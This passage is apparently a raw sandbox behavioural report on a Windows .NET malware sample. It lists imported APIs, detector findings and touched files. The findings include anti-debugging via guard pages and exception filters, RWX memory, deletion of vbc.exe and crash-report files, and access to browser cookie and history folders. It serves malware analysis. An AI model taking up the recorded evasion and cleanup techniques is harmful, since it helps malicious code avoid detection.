- DynamicLoader: kernel32.dll/Wow64GetThreadSelectorEntry
- DynamicLoader: ADVAPI32.dll/CloseServiceHandle
- DynamicLoader: ADVAPI32.dll/ControlService
- DynamicLoader: ADVAPI32.dll/CreateServiceA
- DynamicLoader: ADVAPI32.dll/CreateServiceW
- DynamicLoader: ADVAPI32.dll/DeleteService
- DynamicLoader: ADVAPI32.dll/EnumServicesStatusExA
- DynamicLoader: ADVAPI32.dll/EnumServicesStatusExW
- DynamicLoader: ADVAPI32.dll/GetEventLogInformation
- DynamicLoader: ADVAPI32.dll/GetTokenInformation
- DynamicLoader: ADVAPI32.dll/LookupAccountSidW
- DynamicLoader: ADVAPI32.dll/OpenProcessToken
- DynamicLoader: ADVAPI32.dll/OpenSCManagerA
- DynamicLoader: ADVAPI32.dll/OpenSCManagerW
- DynamicLoader: ADVAPI32.dll/OpenServiceA
- DynamicLoader: ADVAPI32.dll/OpenServiceW
- DynamicLoader: ADVAPI32.dll/StartServiceA
- DynamicLoader: ADVAPI32.dll/StartServiceW
- DynamicLoader: ADVAPI32.dll/GetSidSubAuthority
- DynamicLoader: ADVAPI32.dll/GetSidSubAuthorityCount
- DynamicLoader: VERSION.dll/GetFileVersionInfoSizeExW
- DynamicLoader: VERSION.dll/GetFileVersionInfoExW
- DynamicLoader: dbghelp.dll/DebugExtensionInitialize
- DynamicLoader: dbghelp.dll/WinDbgExtensionDllInit
- DynamicLoader: dbghelp.dll/ExtensionApiVersion
- DynamicLoader: dbghelp.dll/CheckVersion
- DynamicLoader: wer.dll/WerpSetDynamicParameter
- DynamicLoader: wer.dll/WerReportAddDump
- DynamicLoader: wer.dll/WerpSetCallBack
- DynamicLoader: wer.dll/WerReportSetUIOption
- DynamicLoader: wer.dll/WerpAddRegisteredDataToReport
- DynamicLoader: wer.dll/WerReportSubmit
- DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
- DynamicLoader: ADVAPI32.dll/RegGetValueW
- DynamicLoader: ADVAPI32.dll/RegCloseKey
- DynamicLoader: USER32.dll/LoadStringW
- DynamicLoader: ADVAPI32.dll/RegCreateKeyExW
- DynamicLoader: ADVAPI32.dll/RegSetValueExW
- DynamicLoader: ADVAPI32.dll/RegQueryValueExW
- DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
- DynamicLoader: ADVAPI32.dll/CheckTokenMembership
- DynamicLoader: ADVAPI32.dll/FreeSid
- DynamicLoader: SensApi.dll/IsNetworkAlive
- DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
- DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
- DynamicLoader: RPCRT4.dll/NdrClientCall3
- DynamicLoader: USER32.dll/CharUpperW
- DynamicLoader: wer.dll/WerpAddAppCompatData
- DynamicLoader: apphelp.dll/SdbGetFileAttributes
- DynamicLoader: apphelp.dll/SdbFormatAttribute
- DynamicLoader: apphelp.dll/SdbFreeFileAttributes
- DynamicLoader: apphelp.dll/SdbGetFileAttributes
- DynamicLoader: apphelp.dll/SdbFormatAttribute
- DynamicLoader: apphelp.dll/SdbFreeFileAttributes
- DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
- DynamicLoader: CRYPTSP.dll/CryptCreateHash
- DynamicLoader: CRYPTSP.dll/CryptHashData
- DynamicLoader: CRYPTSP.dll/CryptGetHashParam
- DynamicLoader: CRYPTSP.dll/CryptDestroyHash
- DynamicLoader: CRYPTSP.dll/CryptReleaseContext
- DynamicLoader: SHELL32.dll/SHGetFolderPathEx
- DynamicLoader: ole32.dll/StringFromGUID2
- DynamicLoader: profapi.dll/
- DynamicLoader: dbghelp.dll/MiniDumpWriteDump
- DynamicLoader: kernel32.dll/OpenThread
- DynamicLoader: kernel32.dll/Thread32First
- DynamicLoader: kernel32.dll/Thread32Next
- DynamicLoader: kernel32.dll/Module32First
- DynamicLoader: kernel32.dll/Module32Next
- DynamicLoader: kernel32.dll/Module32FirstW
- DynamicLoader: kernel32.dll/Module32NextW
- DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
- DynamicLoader: kernel32.dll/GetLongPathNameA
- DynamicLoader: kernel32.dll/GetLongPathNameW
- DynamicLoader: kernel32.dll/GetProcessTimes
- DynamicLoader: kernel32.dll/GetTimeZoneInformation
- DynamicLoader: ntdll.dll/NtOpenThread
- DynamicLoader: ntdll.dll/NtQuerySystemInformation
- DynamicLoader: ntdll.dll/NtQueryInformationProcess
- DynamicLoader: ntdll.dll/NtQueryInformationThread
- DynamicLoader: ntdll.dll/NtQueryObject
- DynamicLoader: ntdll.dll/NtQueryMutant
- DynamicLoader: ntdll.dll/NtSystemDebugControl
- DynamicLoader: ntdll.dll/RtlFreeHeap
- DynamicLoader: ntdll.dll/RtlGetFunctionTableListHead
- DynamicLoader: ntdll.dll/RtlGetUnloadEventTrace
- DynamicLoader: ntdll.dll/RtlGetUnloadEventTraceEx
- DynamicLoader: ntdll.dll/NtOpenProcessToken
- DynamicLoader: ntdll.dll/NtOpenThreadToken
- DynamicLoader: ntdll.dll/NtQueryInformationToken
- DynamicLoader: ntdll.dll/NtClose
- DynamicLoader: ADVAPI32.dll/OpenProcessToken
- DynamicLoader: ADVAPI32.dll/GetTokenInformation
- DynamicLoader: ADVAPI32.dll/GetSidSubAuthority
- DynamicLoader: ADVAPI32.dll/GetSidSubAuthorityCount
- DynamicLoader: ADVAPI32.dll/RegOpenKeyExA
- DynamicLoader: ADVAPI32.dll/RegQueryValueExA
- DynamicLoader: ADVAPI32.dll/RegCloseKey
- DynamicLoader: powrprof.dll/CallNtPowerInformation
- DynamicLoader: psapi.dll/EnumProcessModules
- DynamicLoader: psapi.dll/GetModuleFileNameExW
- DynamicLoader: ADVAPI32.dll/RegQueryValueExW
- DynamicLoader: VERSION.dll/GetFileVersionInfoSizeA
- DynamicLoader: VERSION.dll/GetFileVersionInfoSizeW
- DynamicLoader: VERSION.dll/GetFileVersionInfoA
- DynamicLoader: VERSION.dll/GetFileVersionInfoW
- DynamicLoader: VERSION.dll/VerQueryValueA
- DynamicLoader: VERSION.dll/VerQueryValueW
- DynamicLoader: verifier.dll/VerifierEnumerateResource
- DynamicLoader: ntdll.dll/NtSuspendProcess
- DynamicLoader: ntdll.dll/NtResumeProcess
- DynamicLoader: kernel32.dll/OpenThread
- DynamicLoader: kernel32.dll/Thread32First
- DynamicLoader: kernel32.dll/Thread32Next
- DynamicLoader: kernel32.dll/Module32First
- DynamicLoader: kernel32.dll/Module32Next
- DynamicLoader: kernel32.dll/Module32FirstW
- DynamicLoader: kernel32.dll/Module32NextW
- DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
- DynamicLoader: kernel32.dll/GetLongPathNameA
- DynamicLoader: kernel32.dll/GetLongPathNameW
- DynamicLoader: kernel32.dll/GetProcessTimes
- DynamicLoader: kernel32.dll/GetTimeZoneInformation
- DynamicLoader: ntdll.dll/NtOpenThread
- DynamicLoader: ntdll.dll/NtQuerySystemInformation
- DynamicLoader: ntdll.dll/NtQueryInformationProcess
- DynamicLoader: ntdll.dll/NtQueryInformationThread
- DynamicLoader: ntdll.dll/NtQueryObject
- DynamicLoader: ntdll.dll/NtQueryMutant
- DynamicLoader: ntdll.dll/NtSystemDebugControl
- DynamicLoader: ntdll.dll/RtlFreeHeap
- DynamicLoader: ntdll.dll/RtlGetFunctionTableListHead
- DynamicLoader: ntdll.dll/RtlGetUnloadEventTrace
- DynamicLoader: ntdll.dll/RtlGetUnloadEventTraceEx
- DynamicLoader: ntdll.dll/NtOpenProcessToken
- DynamicLoader: ntdll.dll/NtOpenThreadToken
- DynamicLoader: ntdll.dll/NtQueryInformationToken
- DynamicLoader: ntdll.dll/NtClose
- DynamicLoader: ADVAPI32.dll/OpenProcessToken
- DynamicLoader: ADVAPI32.dll/GetTokenInformation
- DynamicLoader: ADVAPI32.dll/GetSidSubAuthority
- DynamicLoader: ADVAPI32.dll/GetSidSubAuthorityCount
- DynamicLoader: powrprof.dll/CallNtPowerInformation
- DynamicLoader: psapi.dll/EnumProcessModules
- DynamicLoader: psapi.dll/GetModuleFileNameExW
- DynamicLoader: VERSION.dll/GetFileVersionInfoSizeA
- DynamicLoader: VERSION.dll/GetFileVersionInfoSizeW
- DynamicLoader: VERSION.dll/GetFileVersionInfoA
- DynamicLoader: VERSION.dll/GetFileVersionInfoW
- DynamicLoader: VERSION.dll/VerQueryValueA
- DynamicLoader: VERSION.dll/VerQueryValueW
- DynamicLoader: ADVAPI32.dll/QueryTraceW
- DynamicLoader: ADVAPI32.dll/GetTokenInformation
- DynamicLoader: ADVAPI32.dll/IsValidSid
- DynamicLoader: ADVAPI32.dll/GetLengthSid
- DynamicLoader: ADVAPI32.dll/CopySid
- DynamicLoader: ADVAPI32.dll/InitializeAcl
- DynamicLoader: ADVAPI32.dll/AddAccessAllowedAceEx
- DynamicLoader: ADVAPI32.dll/InitializeSecurityDescriptor
- DynamicLoader: ADVAPI32.dll/SetSecurityDescriptorDacl
- DynamicLoader: ADVAPI32.dll/RegisterEventSourceW
- DynamicLoader: ADVAPI32.dll/ReportEventW
- DynamicLoader: ADVAPI32.dll/DeregisterEventSource
- DynamicLoader: wer.dll/WerpGetStoreLocation
- DynamicLoader: wer.dll/WerpGetStoreType
Guard pages use detected - possible anti-debugging.
Severity: Medium
Confidence: Very High
Anomalous file deletion behavior detected (10+)
Severity: Medium
Confidence: Very High
- DeletedFile: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
- DeletedFile: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER44B6.tmp
- DeletedFile: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER44B6.tmp.appcompat.txt
- DeletedFile: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER44B6.tmp.appcompat.txt
- DeletedFile: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER491C.tmp
- DeletedFile: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER491C.tmp.WERInternalMetadata.xml
- DeletedFile: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER49AA.tmp
- DeletedFile: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER49AA.tmp.hdmp
- DeletedFile: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER6EC7.tmp
- DeletedFile: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER6EC7.tmp.mdmp
- DeletedFile: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER44B6.tmp.appcompat.txt
- DeletedFile: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER491C.tmp.WERInternalMetadata.xml
- DeletedFile: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER49AA.tmp.hdmp
- DeletedFile: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER6EC7.tmp.mdmp
Creates RWX memory
Severity: Medium
Confidence: Medium
At least one process apparently crashed during execution
Severity: Low
Confidence: Very High
SetUnhandledExceptionFilter detected (possible anti-debug)
Severity: Low
Confidence: Very High
Behavior analysis details | |||||
---|---|---|---|---|---|
Machine name | Machine label | Machine manager | Started | Ended | Duration |
Seven01b_64 | Seven01b_64 | VirtualBox | 2018-11-08 12:07:09 | 2018-11-08 12:10:33 | 204 |
11 Summary items with data
Files
C:\Windows\System32\MSCOREE.DLL.local C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll C:\Windows\Microsoft.NET\Framework\* C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll C:\Users\Seven01\AppData\Local\Temp\1.exe.config C:\Users\Seven01\AppData\Local\Temp\1.exe C:\Users\Seven01\AppData\Local\Temp\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\System32\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\system\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\api-ms-win-appmodel-runtime-l1-1-0.dll C:\ProgramData\Oracle\Java\javapath\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\System32\wbem\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\System32\WindowsPowerShell\v1.0\api-ms-win-appmodel-runtime-l1-1-0.dll C:\unrar\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Python27\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSVCR120_CLR0400.dll C:\Windows\System32\MSVCR120_CLR0400.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoree.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config C:\Windows\Microsoft.NET\Framework\v4.0.30319\fusion.localgac C:\Windows\Globalization\Sorting\sortdefault.nls C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\* C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll.aux C:\Users C:\Users\Seven01 C:\Users\Seven01\AppData C:\Users\Seven01\AppData\Local C:\Users\Seven01\AppData\Local\Temp C:\Windows\Microsoft.NET\Framework\v4.0.30319\ole32.dll \Device\KsecDD C:\Windows\assembly\NativeImages_v4.0.30319_32\JwxGfknWiYYAHqUl\* C:\Users\Seven01\AppData\Local\Temp\1.INI C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll C:\Windows\assembly\pubpol28.dat C:\Windows\assembly\GAC\PublisherPolicy.tme C:\Windows\Microsoft.Net\assembly\GAC_32\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\* C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll.aux C:\Windows\Microsoft.Net\assembly\GAC_32\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System\* C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll.aux C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Configuration\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.Xml.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\shell32.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\it-IT\mscorrc.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\it-IT\mscorrc.dll.DLL C:\Windows\Microsoft.NET\Framework\v4.0.30319\it\mscorrc.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\it\mscorrc.dll.DLL C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll C:\Windows\SysWOW64\it-IT\KERNELBASE.dll.mui C:\Windows\assembly\GAC_64 C:\Windows\assembly\GAC_64\mscorlib.resources C:\Windows\assembly\GAC_32 C:\Windows\assembly\GAC_32\mscorlib.resources C:\Windows\assembly\GAC_MSIL C:\Windows\assembly\GAC_MSIL\mscorlib.resources C:\Windows\assembly\GAC_MSIL\mscorlib.resources\* C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll C:\Windows\assembly\GAC C:\Windows\assembly\GAC\mscorlib.resources C:\Windows\Microsoft.Net\assembly\GAC_64 C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib.resources C:\Windows\Microsoft.Net\assembly\GAC_32 C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib.resources C:\Windows\Microsoft.Net\assembly\GAC_MSIL C:\Windows\Microsoft.Net\assembly\GAC_MSIL\mscorlib.resources C:\Windows\Microsoft.Net\assembly\GAC C:\Windows\Microsoft.Net\assembly\GAC_32\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\* C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll.aux C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Xml.Linq\v4.0_4.0.0.0__b77a5c561934e089\System.Xml.Linq.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\ntdll.dll C:\Windows\SysWOW64\ntdll.dll C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies C:\Users\Seven01\AppData\Local\Microsoft\Windows\History C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\desktop.ini C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\History.IE5\desktop.ini C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\ C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\index.dat C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\History.IE5\ C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat C:\Windows\SysWOW64\wlanext.exe.Local\ C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80 C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll C:\Users\Seven01\AppData\Roaming\6MO7-P2A\6MOlogim.jpeg C:\ C:\Windows\Microsoft.NET\Framework\v2.0.50727 C:\Windows\Temp C:\Windows\sysnative\Tasks\Microsoft\Windows\WDI\ResolutionHost C:\Windows\sysnative\LogFiles\Scm\9435f817-fed2-454e-88cd-7f78fda62c48 C:\Windows\sysnative\LogFiles\Scm\eaca24ff-236c-401d-a1e7-b3d5267b8a50 C:\Windows\sysnative\LogFiles\Scm\994c86ad-a929-4b2c-88a0-4e25a107a029 C:\Windows\sysnative\LogFiles\Scm\044a6734-e90e-4f8f-b357-b2dc8ab3b5ec C:\Windows\sysnative\LogFiles\Scm\046fbef8-2dd6-4a92-a08e-608464edcc44 C:\Windows\sysnative\LogFiles\Scm\2f57269b-1e09-4e2d-ab1e-b0fdac7d279c C:\Windows\sysnative\LogFiles\Scm\47536d45-eeec-4bdc-8183-a4dc1f8da9e4 C:\Windows\sysnative\LogFiles\Scm\5c0aeeea-c154-45be-8499-bea5f11baff6 C:\Windows\sysnative\LogFiles\Scm\a7c73732-9f11-4281-8d19-764d4ec9d94d C:\Windows\sysnative\LogFiles\Scm\ac4e5acf-89f7-4220-ba21-81ee183975e2 C:\Windows\sysnative\LogFiles\Scm\be669c13-8165-4536-96d0-6d6c39292aae C:\Windows\sysnative\LogFiles\Scm\c016366b-7126-46ca-b36b-592a3d95a60b C:\Windows\sysnative\LogFiles\Scm\ca4b8ff2-a4d2-4d88-a52e-3a5bdaf7f56e C:\Windows\sysnative\LogFiles\Scm\d43319d0-ba2c-48b0-9b29-b1f6e9b74360 C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp C:\Windows\ServiceProfiles C:\Windows\ServiceProfiles\LocalService C:\Windows\sysnative\Tasks\Microsoft\Windows\RAC\RacTask C:\Windows\sysnative\LogFiles\Scm\fb3c354d-297a-4eb2-9b58-090f6361906b C:\Windows\sysnative\LogFiles\Scm\fdd56c73-f0d5-41b6-b767-6effd7966428 C:\Windows\sysnative\it-IT\radarrs.dll.mui C:\ProgramData\Microsoft\Windows\WER\ReportQueue C:\Windows\sysnative\it-IT\faultrep.dll.mui C:\Windows\sysnative\winxp\triage.ini C:\Windows\sysnative\WINXP C:\Windows\sysnative\winext C:\Windows\sysnative\winext\arcade C:\Windows\sysnative\pri C:\Windows\sysnative C:\Windows\sysnative\ C:\ProgramData\Oracle\Java\javapath C:\ProgramData\Oracle\Java\javapath\ C:\Windows C:\Windows\ C:\Windows\sysnative\wbem C:\Windows\sysnative\wbem\ C:\Windows\sysnative\WindowsPowerShell\v1.0 C:\Windows\sysnative\WindowsPowerShell\v1.0\ C:\unrar C:\unrar\ C:\Python27 C:\Python27\ C:\Windows\sysnative\WINXP\dbghelp.dll C:\Windows\sysnative\winext\dbghelp.dll C:\Windows\sysnative\winext\arcade\dbghelp.dll C:\Windows\sysnative\pri\dbghelp.dll C:\Windows\sysnative\dbghelp.dll C:\Windows\sysnative\WINXP\ext.dll C:\Windows\sysnative\winext\ext.dll C:\Windows\sysnative\winext\arcade\ext.dll C:\Windows\sysnative\pri\ext.dll C:\Windows\sysnative\ext.dll C:\ProgramData\Oracle\Java\javapath\ext.dll C:\Windows\ext.dll C:\Windows\sysnative\wbem\ext.dll C:\Windows\sysnative\WindowsPowerShell\v1.0\ext.dll C:\unrar\ext.dll C:\Python27\ext.dll C:\Windows\sysnative\it-IT\KERNELBASE.dll.mui C:\Windows\sysnative\WINXP\exts.dll C:\Windows\sysnative\winext\exts.dll C:\Windows\sysnative\winext\arcade\exts.dll C:\Windows\sysnative\pri\exts.dll C:\Windows\sysnative\exts.dll C:\ProgramData\Oracle\Java\javapath\exts.dll C:\Windows\exts.dll C:\Windows\sysnative\wbem\exts.dll C:\Windows\sysnative\WindowsPowerShell\v1.0\exts.dll C:\unrar\exts.dll C:\Python27\exts.dll C:\Windows\sysnative\WINXP\uext.dll C:\Windows\sysnative\winext\uext.dll C:\Windows\sysnative\winext\arcade\uext.dll C:\Windows\sysnative\pri\uext.dll C:\Windows\sysnative\uext.dll C:\ProgramData\Oracle\Java\javapath\uext.dll C:\Windows\uext.dll C:\Windows\sysnative\wbem\uext.dll C:\Windows\sysnative\WindowsPowerShell\v1.0\uext.dll C:\unrar\uext.dll C:\Python27\uext.dll C:\Windows\sysnative\WINXP\ntsdexts.dll C:\Windows\sysnative\winext\ntsdexts.dll C:\Windows\sysnative\winext\arcade\ntsdexts.dll C:\Windows\sysnative\pri\ntsdexts.dll C:\Windows\sysnative\ntsdexts.dll C:\ProgramData\Oracle\Java\javapath\ntsdexts.dll C:\Windows\ntsdexts.dll C:\Windows\sysnative\wbem\ntsdexts.dll C:\Windows\sysnative\WindowsPowerShell\v1.0\ntsdexts.dll C:\unrar\ntsdexts.dll C:\Python27\ntsdexts.dll C:\Windows\sysnative\it-IT\wer.dll.mui C:\Windows\sysnative\taskhost.exe C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\ C:\Windows\ServiceProfiles\LocalService\AppData C:\Windows\ServiceProfiles\LocalService\AppData\Local C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER44B6.tmp C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER44B6.tmp.appcompat.txt C:\Windows\sysnative\* C:\Windows\sysnative\kernel32.dll C:\Windows\sysnative\it-IT\kernel32.dll.mui C:\Windows\sysnative\ntdll.dll C:\Windows\sysnative\it-IT\ntdll.dll.mui C:\Windows\sysnative\sqmapi.dll C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_*_7f86ff522426a3314829b0b4bf7c44a66fbeec_cab_* C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_*_7f86ff522426a3314829b0b4bf7c44a66fbeec_cab_* C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER491C.tmp C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER491C.tmp.WERInternalMetadata.xml C:\Windows\sysnative\drivers\*.mrk C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER49AA.tmp C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER49AA.tmp.hdmp C:\Windows\sysnative\KERNELBASE.dll C:\Windows\sysnative\msvcrt.dll C:\Windows\sysnative\ole32.dll C:\Windows\sysnative\gdi32.dll C:\Windows\sysnative\user32.dll C:\Windows\sysnative\lpk.dll C:\Windows\sysnative\usp10.dll C:\Windows\sysnative\rpcrt4.dll C:\Windows\sysnative\oleaut32.dll C:\Windows\sysnative\imm32.dll C:\Windows\sysnative\msctf.dll C:\Windows\sysnative\advapi32.dll C:\Windows\sysnative\sechost.dll C:\Windows\sysnative\api-ms-win-core-synch-l1-2-0.DLL C:\Windows\sysnative\sspicli.dll C:\Windows\sysnative\CRYPTBASE.dll C:\Windows\sysnative\clbcatq.dll C:\Windows\sysnative\RacEngn.dll C:\Windows\sysnative\aepic.dll C:\Windows\sysnative\version.dll C:\Windows\sysnative\tzres.dll C:\Windows\sysnative\it-IT\tzres.dll.mui C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER6EC7.tmp C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER6EC7.tmp.mdmp C:\ProgramData\Microsoft\Windows\WER\ReportQueue\*_*_*_* C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_taskhost.exe_7f86ff522426a3314829b0b4bf7c44a66fbeec_cab_07fe9fbf C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_taskhost.exe_7f86ff522426a3314829b0b4bf7c44a66fbeec_cab_07fe9fbf\WER44B6.tmp.appcompat.txt C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_taskhost.exe_7f86ff522426a3314829b0b4bf7c44a66fbeec_cab_07fe9fbf\WER491C.tmp.WERInternalMetadata.xml C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_taskhost.exe_7f86ff522426a3314829b0b4bf7c44a66fbeec_cab_07fe9fbf\WER49AA.tmp.hdmp C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_taskhost.exe_7f86ff522426a3314829b0b4bf7c44a66fbeec_cab_07fe9fbf\WER6EC7.tmp.mdmp C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_taskhost.exe_7f86ff522426a3314829b0b4bf7c44a66fbeec_cab_07fe9fbf\Report.wer
Read Files
